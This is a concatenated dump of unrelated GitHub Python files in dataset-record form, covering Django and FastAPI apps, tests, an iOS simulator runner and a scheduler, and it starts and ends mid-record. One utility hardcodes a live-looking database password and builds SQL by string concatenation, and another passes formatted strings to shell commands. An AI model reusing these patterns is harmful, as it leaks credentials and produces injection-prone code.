assert test_id in manager.agent_dict\n assert manager.agent_dict[test_id][\"agent\"] == agent\n\n\ndef test_load_agent_raises_error_on_missing_agent(test_db, manager, monkeypatch):\n monkeypatch.setattr(\"perry.db.operations.agents.read_agent\", lambda db, id: None)\n\n with pytest.raises(ValueError):\n manager.load_agent(test_db, -1)\n\n\ndef test_id_should_be_int(test_db, manager):\n with pytest.raises(ValueError):\n manager.load_agent(test_db, \"not_an_int\")\n\n\ndef test_remove_agent_deletes_from_dict(test_db, dummy_agent, manager, monkeypatch):\n test_id = 1\n manager.load_agent(test_db, test_id)\n assert test_id in manager.agent_dict\n manager._remove_agent(test_id)\n assert test_id not in manager.agent_dict\n\n\ndef test_reset_should_reset_state(test_db, dummy_agent, manager, monkeypatch):\n AgentManager.agent_dict = {1: \"dummy\"}\n AgentManager.expiry_queue = \"dummy\"\n AgentManager.lock = \"dummy\"\n AgentManager._cleanup_timeout = \"dummy\"\n\n manager.reset()\n\n assert manager.agent_dict == {}\n assert manager.expiry_queue.empty()\n assert manager.lock is not None\n assert isinstance(manager._cleanup_timeout, timedelta)\n\n\ndef test_remove_agent_does_not_delete_busy_agent(\n test_db, dummy_agent, manager, monkeypatch\n):\n test_id = 1\n agent = manager.load_agent(test_db, test_id)\n agent.busy = True\n manager._remove_agent(test_id)\n assert test_id in manager.agent_dict\n\n\ndef test_cleanup_removes_expired_agents(test_db, dummy_agent, manager, monkeypatch):\n mock_timer = Mock()\n monkeypatch.setattr(\"perry.agents.manager.Timer\", mock_timer)\n\n test_id = 1\n with freezegun.freeze_time(mock_time()):\n manager.load_agent(test_db, test_id)\n with freezegun.freeze_time(\n mock_time() + manager._cleanup_timeout + timedelta(seconds=1)\n ):\n manager._cleanup()\n assert test_id 
not in manager.agent_dict\n assert mock_timer.call_count == 1\n\n\ndef test_cleanup_keeps_unexpired_agents(test_db, dummy_agent, manager, monkeypatch):\n mock_timer = Mock()\n monkeypatch.setattr(\"perry.agents.manager.Timer\", mock_timer)\n\n test_id = 1\n with freezegun.freeze_time(mock_time()):\n manager.load_agent(test_db, test_id)\n with freezegun.freeze_time(\n mock_time() + manager._cleanup_timeout - timedelta(seconds=1)\n ):\n manager._cleanup()\n assert test_id in manager.agent_dict\n assert mock_timer.call_count == 1\n","repo_name":"mickeybeurskens/perry-doc-search","sub_path":"backend/tests/agents/test_manager.py","file_name":"test_manager.py","file_ext":"py","file_size_in_byte":3567,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"27"} +{"seq_id":"30278756286","text":"from django.db.models.signals import post_save\nfrom django.dispatch.dispatcher import receiver\n\nfrom user.models import User\n\nfrom .models import LegalDocument, LegalDocumentTypeChoice\n\n\n@receiver(post_save, sender=LegalDocument)\ndef update_user_terms_and_privacy_acceptance_status(\n sender, instance, created, **kwargs\n):\n update_fields = kwargs.get(\"update_fields\")\n if (\n created or (update_fields and \"description\" in update_fields)\n ) and instance.document_type in [\n LegalDocumentTypeChoice.TERMS_AND_CONDITIONS,\n LegalDocumentTypeChoice.PRIVACY_POLICY,\n ]:\n User.objects.all().update(has_accepted_terms_and_privacy_policy=False)\n","repo_name":"NeatPlus/server","sub_path":"support/signals.py","file_name":"signals.py","file_ext":"py","file_size_in_byte":679,"program_lang":"python","lang":"en","doc_type":"code","stars":4,"dataset":"github-code","pt":"27"} +{"seq_id":"4067331648","text":"from fastapi import status,HTTPException,APIRouter\n\nfrom ..database import conn\n\nrouter=APIRouter(\n prefix=\"/dashboard\",\n tags=['Dashboard']\n)\n\n\n\n@router.get(\"/{id}\")\ndef get_dashboard(id: int):\n cursor = conn.cursor()\n cursor.execute(\n \"\"\"SELECT D.id, D.fname, D.lname, D.gender, D.phone, D.email, D.address, D.blood, D.emergency, COUNT (A.assetid),STRING_AGG(A.AssetName, ', ') AS asset_name\n FROM details D \n LEFT JOIN Asset A ON D.id = A.id \n WHERE D.id = %s \n GROUP BY D.id;\"\"\",\n (str(id),)\n )\n \n dashboard = cursor.fetchone()\n\n if not dashboard:\n raise HTTPException(status_code=status.HTTP_404_NOT_FOUND,\n detail=\"Employee not found\")\n \n return {'Message':'Employee and Asset data','data':dashboard}\n","repo_name":"AbhiramHalyur/Project","sub_path":"app/routers/dashboard.py","file_name":"dashboard.py","file_ext":"py","file_size_in_byte":793,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"27"} +{"seq_id":"19592349411","text":"# -*- coding: utf-8 -*-\nfrom __future__ import unicode_literals\n\nfrom django.db import models, migrations\n\n\nclass Migration(migrations.Migration):\n\n dependencies = [\n ('studycollab', '0015_document_owner'),\n ]\n\n operations = [\n migrations.RenameField(\n model_name='document',\n old_name='file',\n new_name='document',\n ),\n ]\n","repo_name":"anthonyuitz/uvastudycollab","sub_path":"uvastudycollab/studycollab/migrations/0016_auto_20150417_0822.py","file_name":"0016_auto_20150417_0822.py","file_ext":"py","file_size_in_byte":389,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"27"} +{"seq_id":"42944207129","text":"#import pymysql\n#import pymysql.cursors\nimport pymssql\n#import pymssql.cursors\n\n#Create 
function that takes a dictionary and makes a list from it.\ndef getKeys(columns):\n theList = []\n #print(columns)\n theDict = {}\n for item in columns:\n #theDict = {item['COLUMN_NAME']:item['Data_type']}\n theDict[item['COLUMN_NAME']] = item['Data_type']\n #theList.append(dict)\n #print('This thing: '+item['COLUMN_NAME'] + ': '+ item['Data_type'])\n #for key in item:\n #print(key)\n # theList.append(dict(item[key]))\n return theDict\n\n#connect to DB\ndef getConnection():\n connection = pymssql.connect(server='Delphi6vm\\TGISQLEX',\n user='tgia8',\n password='tgi95a8!',\n database='Autumn8')\n\n #Use this for MYSQL\n \"\"\"pymysql.connect(host='localhost',\n user='root',\n password='',\n db='baseball',\n charset='utf8mb4',\n cursorclass=pymysql.cursors.DictCursor)\n \"\"\"\n return connection\ndef getColumns(tableName):\n connection = getConnection()\n columns =[]\n verboseCol = []\n try:\n #with connection.cursor() as cursor:\n with connection.cursor(as_dict=True) as cursor:\n sql = \"select COLUMN_NAME, Data_type from information_schema.columns where\"\n sql += \" table_name = %s\"\n cursor.execute(sql,(tableName,))\n result = cursor.fetchall()\n columns = getKeys(result)\n finally:\n connection.close()\n return columns\n\ndef prettyList(theList):\n theString = \"\"\n theCount = 0\n if len(theList) > 0:\n theString += \"'\"+theList[theCount]+\"'\"\n theCount += 1\n while theCount < len(theList) -1:\n theString += \", '\"+ theList[theCount]+\"'\"\n theCount += 1\n return theString\n\ndef insertRecord(tableName, sql):\n connection = getConnection()\n try:\n sql = addIdentityCheck(tableName,sql)\n with connection.cursor() as cursor:\n #Try to insert the records in the insert\n cursor.execute(sql)\n connection.commit()\n \n except Exception as e:\n print(sql)\n print(e)\n finally:\n connection.close()\n\ndef getValue(theType, value):\n \"\"\"Send back appropriate value given table name and value\"\"\"\n #print(theType + ': '+ value)\n #theType = ''\n #print(theType)\n if value == '':\n return 'NULL'\n else:\n \"\"\"connection = getConnection()\n try:\n with connection.cursor(as_dict = True) as cursor:\n sql = \"SELECT DATA_TYPE FROM INFORMATION_SCHEMA.COLUMNS WHERE \"\n sql += \"table_name = %s AND COLUMN_NAME = %s;\"\n cursor.execute(sql,(tableName, fieldName))\n result = cursor.fetchone()\n theType = result.get('DATA_TYPE')\n finally:\n connection.close()\"\"\"\n if theType > '':\n if theType == 'varchar' or theType == 'char' or theType =='nvarchar':\n return \"'\"+value.strip().replace(\"'\", '')+\"'\"\n elif theType == 'datetime' or theType == 'date':\n return \"'\"+value.strip()+\"'\"\n #return \"STR_TO_DATE('\"+value+\"', '% m/%d/%Y %r')\"\n elif theType == 'bit':\n if value == 'true':\n #print('yes its true')\n return '1'\n else:\n return '0'\n elif theType =='time':\n return \"'\"+value+\"'\"\n return value.strip()\ndef addIdentityCheck(tableName,sql):\n \"\"\"adds check for identity and puts in code correctly\"\"\"\n query = \"\"\"if exists(SELECT OBJECT_NAME(OBJECT_ID) AS TABLENAME \n FROM SYS.IDENTITY_COLUMNS \n WHERE OBJECT_NAME(OBJECT_ID) = '{0}')\n begin\n set identity_insert [{0}] on;\n {1}\n set identity_insert [{0}] off;\n end else\n begin\n {1}\n end\"\"\"\n return query.format(tableName, sql)\n\n","repo_name":"bcalisch/csvData","sub_path":"dbutil.py","file_name":"dbutil.py","file_ext":"py","file_size_in_byte":4312,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"27"} +{"seq_id":"41213262065","text":"from time import 
sleep\n\nfrom gym_airport_tower.airport_tower_env import AirportTowerEnv\n\n# An example of the environment with rendering\n\nenv = AirportTowerEnv()\ndone = False\nenv.reset()\nenv.render()\nwhile not done:\n _, _, done, _ = env.step(env.action_space.sample())\n env.render()\n sleep(1)\nenv.close()\n","repo_name":"MarcSpeckmann/AirportTowerEnv","sub_path":"test_Env.py","file_name":"test_Env.py","file_ext":"py","file_size_in_byte":313,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"27"} +{"seq_id":"70986576711","text":"import argparse\nimport logging\nimport os\nimport sys\nimport subprocess\nimport random\nimport time\nimport plistlib\nimport tempfile\n\nimport error\nimport bauer\nfrom iosinfo import IOSInfo\nfrom bauerargparser import BauerArgParser\n\n\nclass IOSRunner:\n def __init__(self, cmake):\n self.logger = logging.getLogger(__name__)\n\n self.cmake = cmake\n\n self.iosInfo = IOSInfo()\n self.ios_simulator_device_type = None\n self.ios_simulator_os = None\n self.ios_device_id = None\n\n def run(self, configuration, args):\n\n cmakeTargetToRun = self.cmake.executableTarget(args.config, args.target)\n artifactToRun = self.cmake.executableArtifactPath(cmakeTargetToRun)\n artifactToRun = artifactToRun.replace(\"${EFFECTIVE_PLATFORM_NAME}\", \"-iphonesimulator\")\n\n return self.runExecutable(artifactToRun, args)\n\n def runExecutable(self, artifactToRun, args):\n self.ios_simulator_device_type = self.iosInfo.getSelectedDeviceType(args)\n self.ios_simulator_os = self.iosInfo.getSelectedOS(args)\n self.ios_device_id = args.ios_device_id\n\n self.logger.debug(\"IOS Device type: %s\", self.ios_simulator_device_type)\n self.logger.debug(\"IOS Simulator OS: %s\", self.ios_simulator_os)\n self.logger.debug(\"IOS Device ID: %s\", self.ios_device_id)\n\n self.logger.debug(\"Executable: %s\", artifactToRun)\n\n if not artifactToRun:\n raise error.ProgramArgumentError(\"Couldn't find path to exectuable for Module %s\" % args.target)\n\n if artifactToRun.endswith('.app') and os.path.isdir(artifactToRun):\n r = self.readPList(os.path.join(artifactToRun, \"Info.plist\"))\n executable = r[\"CFBundleExecutable\"]\n artifactToRun = os.path.join(artifactToRun, executable)\n\n if not os.path.exists(artifactToRun):\n raise error.ProgramArgumentError(\"exectuable for Module %s does not exists at: %s\" % (args.target, artifactToRun))\n\n bundlePath = self.getBundlePathFromExecutable(artifactToRun)\n\n bundleId = self.getBundleIdentifier(bundlePath)\n self.logger.debug(\"Bundle Identifier: %s\", bundleId)\n\n simulatorId = None\n try:\n if self.ios_device_id != None:\n simulatorId = self.ios_device_id\n else:\n simulatorId = self.createSimulatorDevice()\n self.logger.debug(\"Simulator Id: %s\", simulatorId)\n self.bootSimulator(simulatorId)\n \n self.installApp(simulatorId, bundlePath)\n processId = self.startApp(simulatorId, bundleId, args)\n finally:\n if simulatorId and not self.ios_device_id:\n self.shutdownSimulator(simulatorId)\n\n return 0\n \n def createSimulatorDevice(self):\n simulatorName = \"bdnTestSim-\" + str(random.getrandbits(32))\n\n self.logger.debug(\"Simulator name: %s\", simulatorName)\n\n arguments = [\"xcrun\", \"simctl\", \"create\", simulatorName, \n self.ios_simulator_device_type, \n self.ios_simulator_os]\n\n simulatorId = subprocess.check_output(\" \".join(arguments), shell=True).strip().decode(encoding='utf-8')\n\n if not simulatorId or \" \" in simulatorId or \"\\n\" in simulatorId:\n raise Exception(\"Invalid simulator device ID 
returned.\")\n\n return simulatorId\n\n def bootSimulator(self, simulatorId):\n self.logger.info(\"Booting simulator ...\")\n subprocess.check_call(\"open -a Simulator\", shell=True)\n\n # note that this will fail if the simulator is already booted or is currently booting up.\n # That is ok.\n subprocess.call(\"xcrun simctl boot \" + simulatorId, shell=True)\n\n self.waitForSimulatorStatus(simulatorId, \"booted\", 600)\n\n def installApp(self, simulatorId, bundlePath):\n self.logger.info(\"Installing Application in simulator ...\")\n cmdLine = 'xcrun simctl install \"%s\" \"%s\"' % (simulatorId, bundlePath)\n self.logger.debug(\"Starting: %s\" %(cmdLine))\n subprocess.check_output(cmdLine, shell=True)\n\n def startApp(self, simulatorId, bundleId, args):\n self.logger.info(\"Starting Application ...\")\n\n # --console connects the app's stdout and stderr to ours and blocks indefinitely\n stdoutOptions = []\n self.stdOutFileName = \"\"\n if args.run_output_file:\n self.stdOutFileName = os.path.abspath(args.run_output_file);\n if os.path.exists(self.stdOutFileName):\n os.remove(self.stdOutFileName)\n \n self.logger.debug(\"Redirecting Applications stdout to: %s\", self.stdOutFileName)\n else:\n tf = tempfile.NamedTemporaryFile(mode='w+b', delete=False)\n self.stdOutFileName = tf.name\n\n\n arguments = [\"xcrun\", \"simctl\", \"launch\", \"--console-pty\" ] + [simulatorId, bundleId] + args.params\n\n commandLine = ' '.join('\"{0}\"'.format(arg) for arg in arguments)\n commandLine += \" > %s 2>&1 \" % (self.stdOutFileName);\n\n self.logger.debug(\"Starting: %s\" % commandLine)\n\n result = subprocess.check_call( commandLine , shell=True)\n\n if result != 0:\n self.logger.warning(\"There was an issue running the app\")\n\n try:\n with open(self.stdOutFileName) as fp:\n self.logger.info(\"Application output:\\n\\n%s\" % (fp.read()))\n except:\n pass\n\n if not args.run_output_file:\n os.remove(self.stdOutFileName)\n\n\n #def waitForAppToExit(self, simulatorId, processId, bundleId):\n # self.logger.info(\"Waiting for simulated process %s to exit ...\", processId)\n\n # while True:\n # processListOutput = subprocess.check_output('xcrun simctl spawn \"%s\" launchctl list' % simulatorId, shell=True).decode(encoding='utf-8')\n\n # foundProcess = False\n # for line in processListOutput.splitlines():\n\n # words = line.split()\n\n # if words[0]==processId and bundleId in str(line):\n # foundProcess = True\n # break\n\n # if not foundProcess:\n # self.logger.info(\"Process inside simulator has exited.\")\n # break\n\n # time.sleep(2)\n\n\n def shutdownSimulator(self, simulatorId):\n self.logger.info(\"Shutting down simulator\");\n subprocess.call('xcrun simctl shutdown \"%s\"' % simulatorId, shell=True );\n # note that shutdown automatically waits until the simulator has finished shutting down\n\n self.logger.info(\"Deleting simulator device.\");\n subprocess.call('xcrun simctl delete \"%s\"' % simulatorId, shell=True)\n\n def waitForSimulatorStatus(self, simulatorId, wait_for_status, timeout_seconds):\n timeout_time = time.time()+timeout_seconds\n while True:\n\n status = self.getSimulatorStatus(simulatorId)\n if not status:\n raise Exception(\"Unable to get simulator status.\")\n\n self.logger.debug(\"Simulator status: %s\", status);\n\n if status==wait_for_status:\n break\n\n if time.time() > timeout_time:\n raise Exception(\"Simulator has not reached desired status in %d seconds - timing out.\" % timeout_seconds)\n\n time.sleep(1)\n\n def getSimulatorStatus(self, simulatorId):\n output = 
subprocess.check_output(\"xcrun simctl list\", shell=True).decode(encoding='utf-8')\n\n search_for = \"(\"+simulatorId+\")\"\n\n for line in output.splitlines():\n if search_for in line:\n before, sep, status = line.rpartition(\"(\")\n if sep:\n status, sep, after = status.partition(\")\")\n if sep and status:\n return status.lower()\n\n return None\n\n def getBundlePathFromExecutable(self, executablePath):\n bundlePath = os.path.abspath(os.path.join( executablePath, \"..\"))\n return bundlePath\n\n def readPList(self, plistPath):\n self.logger.info(\"Reading plist at %s\", plistPath)\n if sys.version_info >= (3, 0):\n return plistlib.load( open(plistPath, \"rb\") )\n else:\n tf = tempfile.NamedTemporaryFile(mode='w+b', delete=False)\n os.system('plutil -convert xml1 %s -o %s' % (plistPath,tf.name))\n return plistlib.readPlist(open(tf.name, \"rb\"))\n\n def getBundleIdentifier(self, bundlePath):\n plistPath = os.path.abspath(os.path.join( bundlePath, \"Info.plist\"))\n\n r = self.readPList(plistPath)\n\n return r[\"CFBundleIdentifier\"] \n\ndef main():\n bauer.setupLogging(sys.argv)\n\n argParser = BauerArgParser(None, None)\n parser = argparse.ArgumentParser()\n argParser.setBaseParser(parser)\n\n parser.add_argument('-t', '--target', help='path to the ios app to run', required=True)\n argParser.addSimulatorArguments(parser)\n argParser.addIOSSimulatorArguments(parser)\n argParser.buildGlobalArguments([parser])\n argParser.addParams(parser)\n args = parser.parse_args()\n\n runner = IOSRunner(None)\n runner.runExecutable(args.target, args)\n\nif __name__ == \"__main__\":\n main()\n","repo_name":"AshampooSystems/boden","sub_path":"bauer/iosrunner.py","file_name":"iosrunner.py","file_ext":"py","file_size_in_byte":9171,"program_lang":"python","lang":"en","doc_type":"code","stars":1609,"dataset":"github-code","pt":"27"} +{"seq_id":"41235416904","text":"from django.test import TestCase\nfrom django.urls import reverse\nfrom rest_framework import status\nfrom rest_framework.test import APIClient\nfrom core.models import *\n\nclass ItemViewSetTestCase(TestCase):\n def setUp(self):\n self.client = APIClient()\n\n def test_list_items(self):\n url = reverse('item-list')\n response = self.client.get(url)\n self.assertEqual(response.status_code, status.HTTP_200_OK)\n\n def test_retrieve_item(self):\n item = Item.objects.create(name='Test Item')\n url = reverse('item-detail', args=[item.pk])\n response = self.client.get(url)\n self.assertEqual(response.status_code, status.HTTP_200_OK)\n\n def test_create_item(self):\n url = reverse('item-list')\n data = {'name': 'New Item'}\n response = self.client.post(url, data)\n self.assertEqual(response.status_code, status.HTTP_201_CREATED)\n\n def test_update_item(self):\n item = Item.objects.create(name='Old Name')\n url = reverse('item-detail', args=[item.pk])\n data = {'name': 'New Name'}\n response = self.client.patch(url, data)\n self.assertEqual(response.status_code, status.HTTP_200_OK)\n self.assertEqual(response.data['name'], 'New Name')\n\n def test_delete_item(self):\n item = Item.objects.create(name='Test Item')\n url = reverse('item-detail', args=[item.pk])\n response = self.client.delete(url)\n self.assertEqual(response.status_code, status.HTTP_204_NO_CONTENT)\n self.assertFalse(Item.objects.filter(pk=item.pk).exists())\n\n # Add more tests as needed\n\n\nclass ShiftViewSetTestCase(TestCase):\n def setUp(self):\n self.client = APIClient()\n\n def test_list_shifts(self):\n url = reverse('shift-list')\n response = self.client.get(url)\n 
self.assertEqual(response.status_code, status.HTTP_200_OK)\n\n def test_retrieve_shift(self):\n shift = Shift.objects.create()\n url = reverse('shift-detail', args=[shift.pk])\n response = self.client.get(url)\n self.assertEqual(response.status_code, status.HTTP_200_OK)\n\n def test_create_shift(self):\n url = reverse('shift-list')\n data = {} # Add the required data for creating a shift\n response = self.client.post(url, data)\n self.assertEqual(response.status_code, status.HTTP_201_CREATED)\n\n def test_update_shift(self):\n shift = Shift.objects.create()\n url = reverse('shift-detail', args=[shift.pk])\n data = {} # Add the data to update the shift\n response = self.client.patch(url, data)\n self.assertEqual(response.status_code, status.HTTP_200_OK)\n # Add assertions for updated data\n\n def test_delete_shift(self):\n shift = Shift.objects.create()\n url = reverse('shift-detail', args=[shift.pk])\n response = self.client.delete(url)\n self.assertEqual(response.status_code, status.HTTP_204_NO_CONTENT)\n self.assertFalse(Shift.objects.filter(pk=shift.pk).exists())\n\n # Add more tests as needed\n\n\nclass ReservationViewSetTestCase(TestCase):\n def setUp(self):\n self.client = APIClient()\n\n def test_list_reservations(self):\n url = reverse('reservation-list')\n response = self.client.get(url)\n self.assertEqual(response.status_code, status.HTTP_200_OK)\n\n def test_retrieve_reservation(self):\n reservation = Reservation.objects.create()\n url = reverse('reservation-detail', args=[reservation.pk])\n response = self.client.get(url)\n self.assertEqual(response.status_code, status.HTTP_200_OK)\n\n def test_create_reservation(self):\n url = reverse('reservation-list')\n data = {} # Add the required data for creating a reservation\n response = self.client.post(url, data)\n self.assertEqual(response.status_code, status.HTTP_201_CREATED)\n\n def test_update_reservation(self):\n reservation = Reservation.objects.create()\n url = reverse('reservation-detail', args=[reservation.pk])\n data = {} # Add the data to update the reservation\n response = self.client.patch(url, data)\n self.assertEqual(response.status_code, status.HTTP_200_OK)\n # Add assertions for updated data\n\n def test_delete_reservation(self):\n reservation = Reservation.objects.create()\n url = reverse('reservation-detail', args=[reservation.pk])\n response = self.client.delete(url)\n self.assertEqual(response.status_code, status.HTTP_204_NO_CONTENT)\n self.assertFalse(Reservation.objects.filter(pk=reservation.pk).exists())\n\n # Add more tests as needed\n\n\n\n\n#--------------------------------serializers-----------------------------------------\n\n\n\nfrom django.test import TestCase\nfrom core.models import Item, Shift, Reservation, Service, Category\nfrom django.contrib.auth import get_user_model\nfrom rest_framework import serializers\nfrom .serializers import *\n\nUser = get_user_model()\n\n\nclass SerializerTestCase(TestCase):\n def setUp(self):\n self.category = Category.objects.create(name='Test Category')\n self.service = Service.objects.create(\n name='Test Service', duration=datetime.timedelta(minutes=15), price=10.0\n )\n self.user = User.objects.create_user(\n username='testuser',\n email='test@example.com',\n password='testpassword',\n phone_number='1234567890',\n )\n self.item = Item.objects.create(\n name='Test Item',\n category=self.category,\n description='Test Description',\n )\n self.shift = Shift.objects.create(\n item=self.item,\n is_available=True,\n start_date=datetime.datetime.now(),\n 
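# one-hour test window, so the shift is active at creation time\n            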
end_date=datetime.datetime.now() + datetime.timedelta(hours=1),\n            repeat='do not repeat',\n            n_time_repeat=1,\n        )\n        self.reservation = Reservation.objects.create(\n            reserver=self.user,\n            item=self.item,\n            shift=self.shift,\n            service=self.service,\n            time_date=datetime.datetime.now(),\n            code='ABC123',\n        )\n\n    def test_item_serializer(self):\n        serializer = ItemSerializer(instance=self.item)\n        expected_fields = ['id', 'name', 'category', 'description', 'image', 'experience', 'phone_number', 'last_name', 'first_name']\n        self.assertEqual(set(serializer.data.keys()), set(expected_fields))\n\n    def test_category_serializer(self):\n        serializer = CategorySerializer(instance=self.category)\n        expected_fields = ['id', 'name']\n        self.assertEqual(set(serializer.data.keys()), set(expected_fields))\n\n    def test_shift_serializer(self):\n        serializer = ShiftSerializer(instance=self.shift)\n        expected_fields = ['id', 'start_date', 'end_date', 'repeat', 'shift', 'services', 'item', 'is_available']\n        self.assertEqual(set(serializer.data.keys()), set(expected_fields))\n\n    def test_reservation_serializer(self):\n        serializer = ReservationSerializer(instance=self.reservation)\n        expected_fields = ['id', 'reserver', 'time_date', 'service', 'shift', 'item', 'code', 'status']\n        self.assertEqual(set(serializer.data.keys()), set(expected_fields))\n\n    def test_service_serializer(self):\n        serializer = ServiceSerializer(instance=self.service)\n        expected_fields = ['id', 'name', 'duration', 'price', 'subtitle']\n        self.assertEqual(set(serializer.data.keys()), set(expected_fields))\n\n    def test_custom_user_serializer(self):\n        serializer = CustomUserSerializer(instance=self.user)\n        expected_fields = ['id', 'username', 'email', 'first_name', 'last_name', 'phone_number']\n        self.assertEqual(set(serializer.data.keys()), set(expected_fields))\n\n    def test_custom_user_create_serializer(self):\n        data = {\n            'username': 'newuser',\n            'email': 'newuser@example.com',\n            'password': 'newpassword',\n            'phone_number': '0987654321',\n        }\n        serializer = CustomUserCreateSerializer(data=data)\n        self.assertTrue(serializer.is_valid())\n        validated_data = serializer.validated_data\n        self.assertEqual(validated_data['username'], 'newuser')\n        self.assertEqual(validated_data['email'], 'newuser@example.com')\n        self.assertEqual(validated_data['phone_number'], '0987654321')\n\n    def test_time_serializer(self):\n        data = {'time': datetime.time(hour=9, minute=30)}\n        serializer = TimeSerializer(data=data)\n        self.assertTrue(serializer.is_valid())\n        validated_data = serializer.validated_data\n        self.assertEqual(validated_data['time'], datetime.time(hour=9, minute=30))\n\n\n\n#----------------------sending email -------------------------------\n\nfrom django.test import TestCase\nfrom unittest.mock import patch\nfrom . import send_mail\nfrom . import globals  # assumed here: a sibling module exposing the USERNAME/PASSWORD the assertions reference\n\nclass EmailSendingTestCase(TestCase):\n    @patch('smtplib.SMTP')\n    def test_send_mail(self, mock_smtp):\n        from_email = 'sender@example.com'\n        to_emails = ['recipient@example.com']\n        subject = 'Test Email'\n        html = 'ABC123'\n\n        send_mail(html, subject=subject, from_email=from_email, to_emails=to_emails)\n\n        # Assert that the SMTP instance was called with the correct arguments\n        mock_smtp.assert_called_once_with(host='smtp.gmail.com', port=587)\n        smtp_instance = mock_smtp.return_value\n        smtp_instance.ehlo.assert_called_once()\n        smtp_instance.starttls.assert_called_once()\n        smtp_instance.login.assert_called_once_with(username=globals.USERNAME, password=globals.PASSWORD)\n        smtp_instance.sendmail.assert_called_once_with(from_email, to_emails, mock_smtp.return_value.sendmail.return_value)\n        smtp_instance.quit.assert_called_once()\n","repo_name":"saleh-bool/oop-back","sub_path":"main/tests.py","file_name":"tests.py","file_ext":"py","file_size_in_byte":11168,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"27"}
{"seq_id":"12462991113","text":"import datetime\nimport re\nimport os\n\nimport web\n\nfrom jinja2 import Environment,FileSystemLoader\n\ndef plrl(s1, s2, f):\n    if f > 1:\n        return s2\n    else:\n        return s1\n\ndef timesince(d, now=None):\n    chunks = (\n        (60 * 60 * 24 * 365, lambda n: plrl('year', 'years', n)),\n        (60 * 60 * 24 * 30, lambda n: plrl('month', 'months', n)),\n        (60 * 60 * 24 * 7, lambda n : plrl('week', 'weeks', n)),\n        (60 * 60 * 24, lambda n : plrl('day', 'days', n)),\n        (60 * 60, lambda n: plrl('hour', 'hours', n)),\n        (60, lambda n: plrl('minute', 'minutes', n))\n    )\n    # Convert datetime.date to datetime.datetime for comparison.\n    if not isinstance(d, datetime.datetime):\n        if not isinstance(d, datetime.date):\n            d = datetime.datetime.strptime(d, \"%Y-%m-%d %H:%M:%S\")\n        else:\n            d = datetime.datetime(d.year, d.month, d.day)\n    if now and not isinstance(now, datetime.datetime):\n        now = datetime.datetime(now.year, now.month, now.day)\n\n    if not now:\n        now = datetime.datetime.now()\n\n    # ignore microsecond part of 'd' since we removed it from 'now'\n    delta = now - (d - datetime.timedelta(0, 0, d.microsecond))\n    since = delta.days * 24 * 60 * 60 + delta.seconds\n    if since <= 0:\n        # d is in the future compared to now, stop processing.\n        return u'0 ' + 'minutes'\n    for i, (seconds, name) in enumerate(chunks):\n        count = since // seconds\n        if count != 0:\n            break\n    s = '%(number)d %(type)s' % {'number': count, 'type': name(count)}\n    if i + 1 < len(chunks):\n        # Now get the second item\n        seconds2, name2 = chunks[i + 1]\n        count2 = (since - (seconds * count)) // seconds2\n        if count2 != 0:\n            s += ', %(number)d %(type)s' % {'number': count2, 'type': name2(count2)}\n    return s\n\ndef markdown(text):\n    import markdown2\n\n    link_patterns = [\n        (re.compile(\"#(\\\d+)\"), r\"/issue/\\\1\"),\n        (re.compile(r\"\\\B@(\\\w+)\"), r\"/user/\\\1\"),\n        (re.compile(\"rev:(\\\w{6})\"), r\"/source/browse/?rev=\\\1\"),\n    ]\n    return markdown2.markdown(text, extras=[\"cuddled-lists\", \"link-patterns\"], 
link_patterns=link_patterns)\n\ndef priority_string(p):\n if (p == 1):\n return \"Critical\"\n elif (p == 2):\n return \"High\"\n elif (p == 3):\n return \"Medium\"\n elif (p == 4):\n return \"Low\"\n return \"-\"\n\ndef status_string(s):\n if (s == 0):\n return \"Open\"\n elif (s == 1):\n return \"Closed\"\n return \"-\"\n\ndef avatar(user):\n return \"/static/upload/avatars/%s.png\" % user.id\n\nclass render_jinja:\n\n def __init__(self, *a, **kwargs):\n extensions = kwargs.pop('extensions', [])\n globals = kwargs.pop('globals', {})\n\n self._templ_sub_dir = ''\n\n self._lookup = Environment(loader=FileSystemLoader(*a, **kwargs), extensions=extensions)\n self._lookup.filters['timesince'] = timesince\n self._lookup.filters['markdown'] = markdown\n self._lookup.filters['priority_string'] = priority_string\n self._lookup.filters['status_string'] = status_string\n self._lookup.filters['avatar'] = avatar\n self._lookup.globals.update(globals)\n\n def __getattr__(self, name):\n if self._templ_sub_dir != '':\n name = self._templ_sub_dir + \"/\" + name\n if os.path.exists('./templates/%s/' % name):\n self._templ_sub_dir = name\n return self\n else:\n self._templ_sub_dir = ''\n path = name + '.html'\n t = self._lookup.get_template(path)\n return t.render\n\nrender = render_jinja('templates', encoding='utf-8', globals=web.template.Template.globals, )\n\n\n","repo_name":"cenan/bugtracker","sub_path":"helpers/render.py","file_name":"render.py","file_ext":"py","file_size_in_byte":3724,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"27"} +{"seq_id":"31134265058","text":"# Good morning! Here's your coding interview problem for today.\n\n# This problem was asked by Apple.\n\n# Implement a job scheduler which takes in a function f and an integer n, and calls f after n milliseconds.\n# Soln: https://sathishbabu96n.medium.com/daily-coding-problem-problem-10-da50b93bfc67 \n\nimport time\ndef scheduler(f, n):\n time.sleep(n)\n f()\n\n\nfrom time import sleep, time\nimport heapq, threading\n\nclass Scheduler:\n def __init__(self):\n self.functions = []\n thread = threading.Thread(target=self._poll)\n thread.start()\n def _poll(self):\n while True:\n now = time() * 1000\n if len(self.functions) > 0:\n due, func, args, kwargs = self.functions[0]\n if now > due:\n func(*args, **kwargs)\n self.functions = [(due, func, args, kwargs) for due, func, args, kwargs in self.functions if due < now]\n sleep(0.01)\n def schedule(self, func, n, *args, **kwargs):\n heapq.heappush(self.functions, (n + time() * 1000, func, args, kwargs))","repo_name":"jfur1/daily-coding-problem","sub_path":"08-2022/08-20-2022.py","file_name":"08-20-2022.py","file_ext":"py","file_size_in_byte":1076,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"27"} +{"seq_id":"42106242437","text":"#name Osamah Jawad\n##class Sdev 140\n#profname Nick LaPlante\n##date December 18 2022\n#PIZZA GUI APP\n#using PIL for the pictures\n\nfrom tkinter import *\nfrom tkinter import messagebox\nfrom tkinter import ttk\nfrom PIL import ImageTk, 